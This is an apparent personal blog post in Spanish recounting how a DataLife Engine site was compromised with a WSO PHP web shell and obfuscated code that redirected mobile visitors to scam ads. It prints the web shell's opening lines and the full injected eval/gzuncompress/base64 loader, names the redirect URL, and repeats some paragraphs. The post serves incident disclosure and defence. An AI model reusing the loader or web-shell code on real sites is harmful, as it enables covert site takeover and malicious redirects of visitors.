0
Recientemente este sitio fue atacado por algún desocupado el cual creo una puerta trasera (Backdoor:PHP/WebShell) en tutorialesenline.es en unos de sus directorios.
Una vez que tuvo con esta puerta trasera pudo infectar algunos de los archivos de php de mi cms de datalife engine, con un código ofuscado del php.
Cada vez que un o una nueva dirección IP entraba a la versión móvil de tutorialesenlinea.mejorapp.org lo redireccionaba a:
Una vez que me di cuenta que no era mi móvil si no el dominio en si, escanee todos los directorios y archivos del dominio hasta que dio positivo en un archivo que tenia una puerta trasera, después de ello había ofuscado algunos de los archivos y así hacia los redireccionamiento a esa publicidad engañosa.
EL archivo en cuestión era wso.txt cuando hice una pequeña busqueda me di cuenta que era un #PHP webshell / de archivos Nuevo Web Shell WSO su código fuente estaba en github, a continuación les mostrare un ejemplo del código:
Ahora nos toca la ofuscación del código php de los archivos php.
Como ofuscar Codigo PHP
La ofuscación de código es una técnica que permite ocultar el código para que no sea descifrado o sea difícil de descifrar, y así evitar que se conozcan y/o modifiquen los algoritmos las url y demás codigos.
Para lograr esto por lo general suele usar estas funciones base64_encode, base64_decode y eval.
En la anterior imagen se muestra algunos de los archivos modificados por estos desocupados. Despues de limpiar el codigo ofuscado y de eliminar la puerta trasera el sitio web se muestra con normalidad y sin publicidad para adultos. Acontinuacion les dejare una captura de pantalla de esa mierda de publicidad (A saber que esta era la que mas salía pero son muchas en si ).
Y en conclusión hay que tener mas cuidado con las actualizaciones de seguridad de los cms(sistema de gestión de contenido), módulos, complementos y demás.
Una vez que tuvo con esta puerta trasera pudo infectar algunos de los archivos de php de mi cms de datalife engine, con un código ofuscado del php.
Los antecedentes de la infeccion
Cada vez que un o una nueva dirección IP entraba a la versión móvil de tutorialesenlinea.mejorapp.org lo redireccionaba a:
best-winnerspace1.life/?u=utt8wwl&o=67zmqf5&t=en_mac.txt&cid=41-297-20210223015523b67eb1f15Una vez que me di cuenta que no era mi móvil si no el dominio en si, escanee todos los directorios y archivos del dominio hasta que dio positivo en un archivo que tenia una puerta trasera, después de ello había ofuscado algunos de los archivos y así hacia los redireccionamiento a esa publicidad engañosa.
EL archivo en cuestión era wso.txt cuando hice una pequeña busqueda me di cuenta que era un #PHP webshell / de archivos Nuevo Web Shell WSO su código fuente estaba en github, a continuación les mostrare un ejemplo del código:
<?php
/* WSO 2.2.0 (Web Shell by HARD _LINUX) ESTAS LINEAS HABIA SIDO MODIFICADAS POR EL CABRON */
$auth_ = "21232f297a57a5a743894a0e4a801fc3"; //
$color = "#fff";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP__AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.2.0');...............y aun continua...Ahora nos toca la ofuscación del código php de los archivos php.
Como ofuscar Codigo PHP
La ofuscación de código es una técnica que permite ocultar el código para que no sea descifrado o sea difícil de descifrar, y así evitar que se conozcan y/o modifiquen los algoritmos las url y demás codigos.
Para lograr esto por lo general suele usar estas funciones base64_encode, base64_decode y eval.
- base64_encode(texto) toma como parámetro una cadena de texto y la convierte en codificación base64.
- base64_decode(texto) toma como parámetro una cadena de texto codificada en base64 y la convierte en texto normal.
- eval(texto) toma como parámetro una cadena de texto y la ejecuta como código PHP.
$dle_lic = "@Ev"."AL(gZu"."nCOmp"."rEss(bAS"."e64"."_Dec"."odE('eF6VVW1v2zYQ/isOYIQS7Mgvkm0pntashbEFG9otTVYMrSFQ0lniLIkKScU1yvz3HqUEiQvPwD7ojuS933Ok+rGAkESk55CokYaBaDeGsJQs2cayvMCfDTzPn9g/m2VP657kyRZUlBRcgtUXG9teQiHhWynlfRHdNyD25njYF/BMMJK9fER/TEpQVj969+HD79erz0awtu1vV3iacL5l6BhocKg8lQsRIse+DPgtliSEak82ZdHSqGIQmm3mLs+hNic/Gf4oV/WhycFPtjciRlMveC6djzZ3M3mHlI/MAdz3xv7vlu4JEjFZjWhBjk4+rm79XNZ6mEgAcLmeJNXYOwCBNNpCQ09wiMba+X/UawVxbkZvXX3erjbXR3c03Wy6t+zmV4yp+SPI9qpfLWWwsvZjnwXM9HeHFp4KVC0H2EpiBafFsQOwyHJsIz3KykGSQCqIKN4GWG7jrUNwgO0tOlCUDHIF6yyYGmKHhSJe4bliVOXSozjJcjUyq20CedIeJYljeCa4YRfurj0dXdath7lxVn7ZK2BvwPYiM7l8DbKcfeIxN014gCqoSn3SwblZoKWoICEX7pb2G/4yJFM9xIOG9EOEG7IxWFr0s6x5p+8E5yperLkSnDtBEpqptmfmVquctZAZbrB/6FITY6fqCFZQAfPhGZmb4iO91YVUFGET7ZHCDtBq73U6kiQavUmkz8+XC68FzbrgVkqF0XNMEGGHiX/x87y5tPFheGDNzFYnFhiP0GTaqkrNvrYV8+x8YrNBkaVbsdwLOXaf7t9vbP6A530S+/rt7fkrW5hCfEeCHbe3rW1lBSleQWGcWUpY1OsO8a21+A/uS+i/SqUPS60p8yUBqzgK+a0YiKJNc051yzrKT6LVe6ZjiEmpYxGv5D3wq+05xnuIlRWFJWOCNGOjDwDcACDmK3np1OT2i+dUSjH7ZOwjsnjk6bZGs+LXnGGy1zqDBwRR9MUF44SRda6B1TOH+aVVLRDLOqzK4rrVFNDEideN/lzdOKb3VT8ExvEMWYO1pCW9veFIf5yAo9y5JNtYgTR8esyro6zONtqjgso3ZiLFxiRLkvYy51lQrOUl2ytNYgGMgvvflY5yqJNI9xW/0xI06jJaoVbFdJ3zCl5aZYA/++HtJ2kB+N/BOcJ/zfq4ztP/oRUdpBjSNK1gJzXeuoxJ051wA5DGFJsbFqa7SiNjlVPntaZp+XqFBoIqxqsuQ8G6EGbVOwt75nU+8sA//RwWx97yx8fH701Gaes=')));";$lic_true = "cre"."ate_"."function";@$dle_conf = $lic_true('', "$dle_lic;");$dle_conf(''); 
En la anterior imagen se muestra algunos de los archivos modificados por estos desocupados. Despues de limpiar el codigo ofuscado y de eliminar la puerta trasera el sitio web se muestra con normalidad y sin publicidad para adultos. Acontinuacion les dejare una captura de pantalla de esa mierda de publicidad (A saber que esta era la que mas salía pero son muchas en si ).
Y en conclusión hay que tener mas cuidado con las actualizaciones de seguridad de los cms(sistema de gestión de contenido), módulos, complementos y demás.
Comentarios